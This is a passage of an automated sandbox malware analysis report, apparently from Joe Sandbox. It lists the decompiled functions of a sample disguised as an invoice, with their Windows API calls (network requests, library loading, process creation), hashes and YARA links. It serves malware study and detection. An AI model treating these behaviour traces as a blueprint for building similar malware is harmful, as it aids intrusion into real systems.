                                                              • GetLastError.KERNEL32(?,00000000), ref: 0023E768
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0023E78D
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0023E7B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID: p1#v`K$v
                                                              • API String ID: 3321077145-1068180069
                                                              • Opcode ID: 25af63cde53b8e5f2bb0294799f7dde410b01f94f672a55733a88a2574705525
                                                              • Instruction ID: c25abd26ad97031d935dd91eed3abd7689cbf47041f0a4668be74dcbd12796e5
                                                              • Opcode Fuzzy Hash: 25af63cde53b8e5f2bb0294799f7dde410b01f94f672a55733a88a2574705525
                                                              • Instruction Fuzzy Hash: A1412579200615DFCF11EF25C445A5DBBE5BF99710F098089EA0AAB3A2CB30FC55CB91
                                                              Function 00250567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00250587
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              • Opcode ID: 38aad16d5e4f279c84f8a688abb61809c1ed9d201aa0d439f868eb1f4e9e00a4
                                                              • Instruction ID: 4a7291e0fed163bd0e899dade9d92fb58b728d560c29d4d9d29412c13efb2ce1
                                                              • Opcode Fuzzy Hash: 38aad16d5e4f279c84f8a688abb61809c1ed9d201aa0d439f868eb1f4e9e00a4
                                                              • Instruction Fuzzy Hash: E031947052021AAFCF00EF54CD819FEB3B8FF55314B104629E825A76D1DB71E925CB90
                                                              Function 0022B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0022B88E
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0022B8A1
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 0022B8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 912ba7bd7b969dfcb4cc480661b63734d2fa8aa833e94c54244456ed637c3ed9
                                                              • Instruction ID: e37b742681ffe81705d2aa54770817d221a8b5c59313612ff66daad112174400
                                                              • Opcode Fuzzy Hash: 912ba7bd7b969dfcb4cc480661b63734d2fa8aa833e94c54244456ed637c3ed9
                                                              • Instruction Fuzzy Hash: C82143B6910108BFDB04AFA4EC8ADFE777CDF42350B504129F129A31E1DB740D2A9B60
                                                              Function 002443E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00244401
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00244427
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00244457
                                                              • InternetCloseHandle.WININET(00000000), ref: 0024449E
                                                                • Part of subcall function 00245052: GetLastError.KERNEL32(?,?,002443CC,00000000,00000000,00000001), ref: 00245067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 1951874230-3916222277
                                                              • Opcode ID: 0c69c05d4d0fdfc2d9858101551c0a46bc5174d9df3de987acdbcdf46c8af775
                                                              • Instruction ID: 8b987b04dd64b5c2ab208092653e0ce8fd050f26d60120c9abfe41a22cf4fa1a
                                                              • Opcode Fuzzy Hash: 0c69c05d4d0fdfc2d9858101551c0a46bc5174d9df3de987acdbcdf46c8af775
                                                              • Instruction Fuzzy Hash: 6B218EB6610608BFE719AF64DC85FBFB6FCEF48758F10801AF109A2140EA648D559B70
                                                              Function 002590E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                                • Part of subcall function 0020D17C: GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                                • Part of subcall function 0020D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0025915C
                                                              • LoadLibraryW.KERNEL32(?), ref: 00259163
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00259178
                                                              • DestroyWindow.USER32(?), ref: 00259180
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: f9407c117bcadc24811800fd531b896725e5d15dbbe93713968851f5faf0328e
                                                              • Instruction ID: 3defc63842545f3c6cb777c701ecb020c2085be29c940af7e0a8fca893046a31
                                                              • Opcode Fuzzy Hash: f9407c117bcadc24811800fd531b896725e5d15dbbe93713968851f5faf0328e
                                                              • Instruction Fuzzy Hash: A821DE71220617FBEF104F649C88EBB33ADEF99365F108618FD1892190C771CCA5AB64
                                                              Function 00239568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00239588
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002395B9
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 002395CB
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00239605
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: ac5d67b79cd7dfc09b163c69369ff9eeb653e628862b63287df226be4293ef27
                                                              • Instruction ID: 7554f3ccb293c25d052d0f17b455a703f4fd7a8e1205489b4978999c8bf70158
                                                              • Opcode Fuzzy Hash: ac5d67b79cd7dfc09b163c69369ff9eeb653e628862b63287df226be4293ef27
                                                              • Instruction Fuzzy Hash: 5F21B2B0510206AFEB219F29DC05A9A77F8AF46720F604A19FDA5D72D0D7B0D9E1CB10
                                                              Function 00239634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00239653
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00239683
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00239694
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002396CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 13d4ae76e4190edc34d054268ab7da3c0166ca6a68b60e042a793117096e195d
                                                              • Instruction ID: 18e14fed8328c0dd843b3a4ba7e0a4aa7df34f64a85499e1c141f0647113165d
                                                              • Opcode Fuzzy Hash: 13d4ae76e4190edc34d054268ab7da3c0166ca6a68b60e042a793117096e195d
                                                              • Instruction Fuzzy Hash: 8121A4B15212069BDB209F699C06E9A77FCAF46720F200A19FCA1D32D0D7F098E1CF10
                                                              Function 0023DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023DB0A
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0023DB5E
                                                              • __swprintf.LIBCMT ref: 0023DB77
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0028DC00), ref: 0023DBB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 583d2bf8d5daf61e0cb165c5e83866b4e5f96ce20495ad7ee4cfb8e55c5f6aa3
                                                              • Instruction ID: 9dd2a31da914a4e6d58d7567f107635e59ea1603846b387cf82dd5be021d837f
                                                              • Opcode Fuzzy Hash: 583d2bf8d5daf61e0cb165c5e83866b4e5f96ce20495ad7ee4cfb8e55c5f6aa3
                                                              • Instruction Fuzzy Hash: 2421837560010CAFCB10EFA4DD85DEEB7B8EF49704B104069FA09E7251DB70EA51DB60
                                                              Function 0022C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0022C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0022C84A
                                                                • Part of subcall function 0022C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0022C85D
                                                                • Part of subcall function 0022C82D: GetCurrentThreadId.KERNEL32 ref: 0022C864
                                                                • Part of subcall function 0022C82D: AttachThreadInput.USER32(00000000), ref: 0022C86B
                                                              • GetFocus.USER32 ref: 0022CA05
                                                                • Part of subcall function 0022C876: GetParent.USER32(?), ref: 0022C884
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0022CA4E
                                                              • EnumChildWindows.USER32(?,0022CAC4), ref: 0022CA76
                                                              • __swprintf.LIBCMT ref: 0022CA90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                              • String ID: %s%d
                                                              • API String ID: 3187004680-1110647743
                                                              • Opcode ID: ac06a90187952c8f967aa970b821a76d3b5de2df123b43d22f05c3b0b67cc17b
                                                              • Instruction ID: abff0249e3fa11b3758e5ccb477db0e8d96f3e616b3430c9c657d98a604435f4
                                                              • Opcode Fuzzy Hash: ac06a90187952c8f967aa970b821a76d3b5de2df123b43d22f05c3b0b67cc17b
                                                              • Instruction Fuzzy Hash: 1411D3B5610219BBCF01BFA0AC89FED377CAF55704F108066FE08AA182DBB09955CB71
                                                              Function 00217A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __lock.LIBCMT ref: 00217AD8
                                                                • Part of subcall function 00217CF4: __mtinitlocknum.LIBCMT ref: 00217D06
                                                                • Part of subcall function 00217CF4: EnterCriticalSection.KERNEL32(00000000,?,00217ADD,0000000D), ref: 00217D1F
                                                              • InterlockedIncrement.KERNEL32(?), ref: 00217AE5
                                                              • __lock.LIBCMT ref: 00217AF9
                                                              • ___addlocaleref.LIBCMT ref: 00217B17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                              • String ID: `'
                                                              • API String ID: 1687444384-3949923725
                                                              • Opcode ID: 1ec8ce98ee36e6d234e9cb2d2afcc2837122d38ee2c6e00098ade445b1e11c35
                                                              • Instruction ID: 22289c958620ab467b6a3be279e7830f6e51488f7d3e603784dbb872d82c65b4
                                                              • Opcode Fuzzy Hash: 1ec8ce98ee36e6d234e9cb2d2afcc2837122d38ee2c6e00098ade445b1e11c35
                                                              • Instruction Fuzzy Hash: CD016D71414B009FD720DF75D90978AF7F0AFA4325F20894EA49A976A0CB70A694CF51
                                                              Function 0025E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0025E33D
                                                              • _memset.LIBCMT ref: 0025E34C
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002B3D00,002B3D44), ref: 0025E37B
                                                              • CloseHandle.KERNEL32 ref: 0025E38D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID: D=+
                                                              • API String ID: 3277943733-1317424624
                                                              • Opcode ID: 9c6fd2e09c5612c8c97fd37fd76fd702c865cd7762c1d159e7ad5c178a203cd9
                                                              • Instruction ID: 55092c007ee9b156f0baacb632a02909b5bf065b94e06222b67dacb2cf525682
                                                              • Opcode Fuzzy Hash: 9c6fd2e09c5612c8c97fd37fd76fd702c865cd7762c1d159e7ad5c178a203cd9
                                                              • Instruction Fuzzy Hash: BFF082F1550306BEE3109B60BC59FBB7EACDB04B54F004921FE08D61A2D3759E608AA8
                                                              Function 00251945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002519F3
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00251A26
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00251B49
                                                              • CloseHandle.KERNEL32(?), ref: 00251BBF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: 955a7a4f7256c36e38ead24f0943daf25414a3b55a355620e79f39815dc804ed
                                                              • Instruction ID: 4074154461cac3491d238debb55015779976fe5c265aa5e017cfbebcd2058fda
                                                              • Opcode Fuzzy Hash: 955a7a4f7256c36e38ead24f0943daf25414a3b55a355620e79f39815dc804ed
                                                              • Instruction Fuzzy Hash: 9E816F70610305ABDF10AF64C886BADBBE5BF08724F14845AF905AF3C2D7B4A9658F94
                                                              Function 0025E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0025E1D5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0025E20D
                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0025E248
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0025E269
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0025E281
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                              • String ID:
                                                              • API String ID: 3188977179-0
                                                              • Opcode ID: 87ed4a4d5482d4fc6e02326d550da875a1ebd6335e1c1f7f990309b7abe57c6a
                                                              • Instruction ID: 381b9332c01cbf6ea59c56a57b10c33677cf356c41dcddd8d160a1a06addd893
                                                              • Opcode Fuzzy Hash: 87ed4a4d5482d4fc6e02326d550da875a1ebd6335e1c1f7f990309b7abe57c6a
                                                              • Instruction Fuzzy Hash: 1661E134620605AFDF28CF18C894FBA77BAEF49301F168059FD59A7291C770AE68CB14
                                                              Function 00231C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00231CB4
                                                              • VariantClear.OLEAUT32(00000013), ref: 00231D26
                                                              • VariantClear.OLEAUT32(00000000), ref: 00231D81
                                                              • VariantClear.OLEAUT32(?), ref: 00231DF8
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00231E26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: bd5674a6309a378f845fe0f1474f11fa2d2f3833dbe53b2a0b812e2853f12c60
                                                              • Instruction ID: 7b7246c5c5b588a90417c80dc59dc2a65ea1cebce5f82f6dab284c26c0c3caa6
                                                              • Opcode Fuzzy Hash: bd5674a6309a378f845fe0f1474f11fa2d2f3833dbe53b2a0b812e2853f12c60
                                                              • Instruction Fuzzy Hash: A35147B5A10209AFDB14CF58C884AAAB7B8FF4D314F158559ED59DB301E730EA61CFA0
                                                              Function 00250688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002506EE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0025077D
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0025079B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 002507E1
                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 002507FB
                                                                • Part of subcall function 0020E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0023A574,?,?,00000000,00000008), ref: 0020E675
                                                                • Part of subcall function 0020E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0023A574,?,?,00000000,00000008), ref: 0020E699
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
